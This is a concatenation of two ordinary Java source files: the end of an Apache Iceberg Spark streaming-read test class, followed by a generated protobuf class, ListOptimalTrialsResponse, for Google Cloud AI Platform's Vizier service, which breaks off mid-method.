1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotType2RewriteDataFilesIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); makeRewriteDataFiles(); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeRewriteDataFilesIgnoresReplaceFollowedByAppend() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); makeRewriteDataFiles(); appendDataAsMultipleSnapshots(expected); assertMicroBatchRecordSizes( ImmutableMap.of(SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1"), List.of(1L, 2L, 1L, 1L, 1L, 1L, 1L, 2L, 1L, 1L, 1L, 1L)); } @TestTemplate public void testReadStreamWithSnapshotTypeReplaceIgnoresReplace() throws Exception { // fill table with some data List<List<SimpleRecord>> expected = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(expected); // this should create a snapshot with type Replace. table.rewriteManifests().clusterBy(f -> 1).commit(); // check pre-condition assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.REPLACE); StreamingQuery query = startStream(); List<SimpleRecord> actual = rowsAvailable(query); assertThat(actual).containsExactlyInAnyOrderElementsOf(Iterables.concat(expected)); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteErrorsOut() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE); StreamingQuery query = startStream(); assertThatThrownBy(query::processAllAvailable) .cause() .isInstanceOf(IllegalStateException.class) .hasMessageStartingWith("Cannot process delete snapshot"); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteAndSkipDeleteOption() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); // this should create a snapshot with type delete. table.newDelete().deleteFromRowFilter(Expressions.equal("id", 4)).commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // DELETE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.DELETE); StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_DELETE_SNAPSHOTS, "true"); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots)); } @TestTemplate public void testReadStreamWithSnapshotTypeDeleteAndSkipOverwriteOption() throws Exception { table.updateSpec().removeField("id_bucket").addField(ref("id")).commit(); // fill table with some data List<List<SimpleRecord>> dataAcrossSnapshots = TEST_DATA_MULTIPLE_SNAPSHOTS; appendDataAsMultipleSnapshots(dataAcrossSnapshots); DataFile dataFile = DataFiles.builder(table.spec()) .withPath(File.createTempFile("junit", null, temp.toFile()).getPath()) .withFileSizeInBytes(10) .withRecordCount(1) .withFormat(FileFormat.PARQUET) .build(); // this should create a snapshot with type overwrite. table .newOverwrite() .addFile(dataFile) .overwriteByRowFilter(Expressions.greaterThan("id", 4)) .commit(); // check pre-condition - that the above delete operation on table resulted in Snapshot of Type // OVERWRITE. assertThat(table.currentSnapshot().operation()).isEqualTo(DataOperations.OVERWRITE); StreamingQuery query = startStream(SparkReadOptions.STREAMING_SKIP_OVERWRITE_SNAPSHOTS, "true"); assertThat(rowsAvailable(query)) .containsExactlyInAnyOrderElementsOf(Iterables.concat(dataAcrossSnapshots)); } /** * We are testing that all the files in a rewrite snapshot are skipped Create a rewrite data files * snapshot using existing files. */ public void makeRewriteDataFiles() { table.refresh(); // we are testing that all the files in a rewrite snapshot are skipped // create a rewrite data files snapshot using existing files RewriteFiles rewrite = table.newRewrite(); Iterable<Snapshot> it = table.snapshots(); for (Snapshot snapshot : it) { if (snapshot.operation().equals(DataOperations.APPEND)) { Iterable<DataFile> datafiles = snapshot.addedDataFiles(table.io()); for (DataFile datafile : datafiles) { rewrite.addFile(datafile); rewrite.deleteFile(datafile); } } } rewrite.commit(); } /** * appends each list as a Snapshot on the iceberg table at the given location. accepts a list of * lists - each list representing data per snapshot. */ private void appendDataAsMultipleSnapshots(List<List<SimpleRecord>> data) { for (List<SimpleRecord> l : data) { appendData(l); } } private void appendData(List<SimpleRecord> data) { appendData(data, "parquet"); } private void appendData(List<SimpleRecord> data, String format) { Dataset<Row> df = spark.createDataFrame(data, SimpleRecord.class); df.select("id", "data") .write() .format("iceberg") .option("write-format", format) .mode("append") .save(tableName); } private static final String MEMORY_TABLE = "_stream_view_mem"; private StreamingQuery startStream(Map<String, String> options) throws TimeoutException { return spark .readStream() .options(options) .format("iceberg") .load(tableName) .writeStream() .options(options) .format("memory") .queryName(MEMORY_TABLE) .outputMode(OutputMode.Append()) .start(); } private StreamingQuery startStream() throws TimeoutException { return startStream(Collections.emptyMap()); } private StreamingQuery startStream(String key, String value) throws TimeoutException { return startStream( ImmutableMap.of(key, value, SparkReadOptions.STREAMING_MAX_FILES_PER_MICRO_BATCH, "1")); } private void assertMicroBatchRecordSizes( Map<String, String> options, List<Long> expectedMicroBatchRecordSize) throws TimeoutException { assertMicroBatchRecordSizes(options, expectedMicroBatchRecordSize, Trigger.ProcessingTime(0L)); } private void assertMicroBatchRecordSizes( Map<String, String> options, List<Long> expectedMicroBatchRecordSize, Trigger trigger) throws TimeoutException { Dataset<Row> ds = spark.readStream().options(options).format("iceberg").load(tableName); List<Long> syncList = Collections.synchronizedList(Lists.newArrayList()); ds.writeStream() .options(options) .trigger(trigger) .foreachBatch( (VoidFunction2<Dataset<Row>, Long>) (dataset, batchId) -> { syncList.add(dataset.count()); }) .start() .processAllAvailable(); stopStreams(); assertThat(syncList).containsExactlyInAnyOrderElementsOf(expectedMicroBatchRecordSize); } private List<SimpleRecord> rowsAvailable(StreamingQuery query) { query.processAllAvailable(); return spark .sql("select * from " + MEMORY_TABLE) .as(Encoders.bean(SimpleRecord.class)) .collectAsList(); } }
googleapis/google-cloud-java
35,877
java-aiplatform/proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ListOptimalTrialsResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/aiplatform/v1/vizier_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.aiplatform.v1; /** * * * <pre> * Response message for * [VizierService.ListOptimalTrials][google.cloud.aiplatform.v1.VizierService.ListOptimalTrials]. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListOptimalTrialsResponse} */ public final class ListOptimalTrialsResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) ListOptimalTrialsResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListOptimalTrialsResponse.newBuilder() to construct. private ListOptimalTrialsResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListOptimalTrialsResponse() { optimalTrials_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListOptimalTrialsResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.class, com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.Builder.class); } public static final int OPTIMAL_TRIALS_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.cloud.aiplatform.v1.Trial> optimalTrials_; /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public java.util.List<com.google.cloud.aiplatform.v1.Trial> getOptimalTrialsList() { return optimalTrials_; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsOrBuilderList() { return optimalTrials_; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public int getOptimalTrialsCount() { return optimalTrials_.size(); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.Trial getOptimalTrials(int index) { return optimalTrials_.get(index); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ @java.lang.Override public com.google.cloud.aiplatform.v1.TrialOrBuilder getOptimalTrialsOrBuilder(int index) { return optimalTrials_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < optimalTrials_.size(); i++) { output.writeMessage(1, optimalTrials_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < optimalTrials_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, optimalTrials_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse other = (com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) obj; if (!getOptimalTrialsList().equals(other.getOptimalTrialsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getOptimalTrialsCount() > 0) { hash = (37 * hash) + OPTIMAL_TRIALS_FIELD_NUMBER; hash = (53 * hash) + getOptimalTrialsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for * [VizierService.ListOptimalTrials][google.cloud.aiplatform.v1.VizierService.ListOptimalTrials]. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1.ListOptimalTrialsResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ListOptimalTrialsResponse) com.google.cloud.aiplatform.v1.ListOptimalTrialsResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.class, com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (optimalTrialsBuilder_ == null) { optimalTrials_ = java.util.Collections.emptyList(); } else { optimalTrials_ = null; optimalTrialsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1.VizierServiceProto .internal_static_google_cloud_aiplatform_v1_ListOptimalTrialsResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse build() { com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse buildPartial() { com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result = new com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result) { if (optimalTrialsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { optimalTrials_ = java.util.Collections.unmodifiableList(optimalTrials_); bitField0_ = (bitField0_ & ~0x00000001); } result.optimalTrials_ = optimalTrials_; } else { result.optimalTrials_ = optimalTrialsBuilder_.build(); } } private void buildPartial0(com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) { return mergeFrom((com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse other) { if (other == com.google.cloud.aiplatform.v1.ListOptimalTrialsResponse.getDefaultInstance()) return this; if (optimalTrialsBuilder_ == null) { if (!other.optimalTrials_.isEmpty()) { if (optimalTrials_.isEmpty()) { optimalTrials_ = other.optimalTrials_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureOptimalTrialsIsMutable(); optimalTrials_.addAll(other.optimalTrials_); } onChanged(); } } else { if (!other.optimalTrials_.isEmpty()) { if (optimalTrialsBuilder_.isEmpty()) { optimalTrialsBuilder_.dispose(); optimalTrialsBuilder_ = null; optimalTrials_ = other.optimalTrials_; bitField0_ = (bitField0_ & ~0x00000001); optimalTrialsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getOptimalTrialsFieldBuilder() : null; } else { optimalTrialsBuilder_.addAllMessages(other.optimalTrials_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloud.aiplatform.v1.Trial m = input.readMessage( com.google.cloud.aiplatform.v1.Trial.parser(), extensionRegistry); if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(m); } else { optimalTrialsBuilder_.addMessage(m); } break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.aiplatform.v1.Trial> optimalTrials_ = java.util.Collections.emptyList(); private void ensureOptimalTrialsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { optimalTrials_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1.Trial>(optimalTrials_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1.Trial, com.google.cloud.aiplatform.v1.Trial.Builder, com.google.cloud.aiplatform.v1.TrialOrBuilder> optimalTrialsBuilder_; /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<com.google.cloud.aiplatform.v1.Trial> getOptimalTrialsList() { if (optimalTrialsBuilder_ == null) { return java.util.Collections.unmodifiableList(optimalTrials_); } else { return optimalTrialsBuilder_.getMessageList(); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public int getOptimalTrialsCount() { if (optimalTrialsBuilder_ == null) { return optimalTrials_.size(); } else { return optimalTrialsBuilder_.getCount(); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial getOptimalTrials(int index) { if (optimalTrialsBuilder_ == null) { return optimalTrials_.get(index); } else { return optimalTrialsBuilder_.getMessage(index); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder setOptimalTrials(int index, com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.set(index, value); onChanged(); } else { optimalTrialsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder setOptimalTrials( int index, com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.set(index, builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.add(value); onChanged(); } else { optimalTrialsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(int index, com.google.cloud.aiplatform.v1.Trial value) { if (optimalTrialsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureOptimalTrialsIsMutable(); optimalTrials_.add(index, value); onChanged(); } else { optimalTrialsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials(com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addOptimalTrials( int index, com.google.cloud.aiplatform.v1.Trial.Builder builderForValue) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.add(index, builderForValue.build()); onChanged(); } else { optimalTrialsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder addAllOptimalTrials( java.lang.Iterable<? extends com.google.cloud.aiplatform.v1.Trial> values) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, optimalTrials_); onChanged(); } else { optimalTrialsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder clearOptimalTrials() { if (optimalTrialsBuilder_ == null) { optimalTrials_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { optimalTrialsBuilder_.clear(); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public Builder removeOptimalTrials(int index) { if (optimalTrialsBuilder_ == null) { ensureOptimalTrialsIsMutable(); optimalTrials_.remove(index); onChanged(); } else { optimalTrialsBuilder_.remove(index); } return this; } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.Trial.Builder getOptimalTrialsBuilder(int index) { return getOptimalTrialsFieldBuilder().getBuilder(index); } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public com.google.cloud.aiplatform.v1.TrialOrBuilder getOptimalTrialsOrBuilder(int index) { if (optimalTrialsBuilder_ == null) { return optimalTrials_.get(index); } else { return optimalTrialsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The pareto-optimal Trials for multiple objective Study or the * optimal trial for single objective Study. The definition of * pareto-optimal can be checked in wiki page. * https://en.wikipedia.org/wiki/Pareto_efficiency * </pre> * * <code>repeated .google.cloud.aiplatform.v1.Trial optimal_trials = 1;</code> */ public java.util.List<? extends com.google.cloud.aiplatform.v1.TrialOrBuilder> getOptimalTrialsOrBuilderList() { if (optimalTrialsBuilder_ != null) { return optimalTrialsBuilder_.getMessageOrBuilderList(); } else 